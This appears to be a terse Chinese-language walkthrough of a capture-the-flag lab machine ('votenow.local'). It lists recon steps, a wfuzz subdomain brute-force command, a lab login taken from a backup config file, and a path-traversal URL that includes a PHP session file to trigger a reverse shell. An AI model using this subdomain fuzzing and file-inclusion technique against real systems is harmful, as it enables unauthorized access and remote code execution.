查看靶机mac地址
主机发现
访问ip
目录扫描
端口扫描
获取config.php.bak文件
他的邮箱可能是他的域名
将ip和域名放到hosts文件中
对域名进行目录扫描 还是没有有用的信息
尝试爆破子域名
wfuzz -H 'HOST:FUZZ.votenow.local' -u 'http://192.168.154.149' -w /home/kali/Desktop/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45
将子域名放到hosts文件
访问子域名
使用之前的config.php.bak账号密码
votebox / casoj3FFASPsbyoRP
进行反弹shell
写入反弹shell语句 vps进行监听
访问 cookie值是文件名
/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_9m1f4b9l84cbomo7krgpk32pfgiutkl1
反弹成功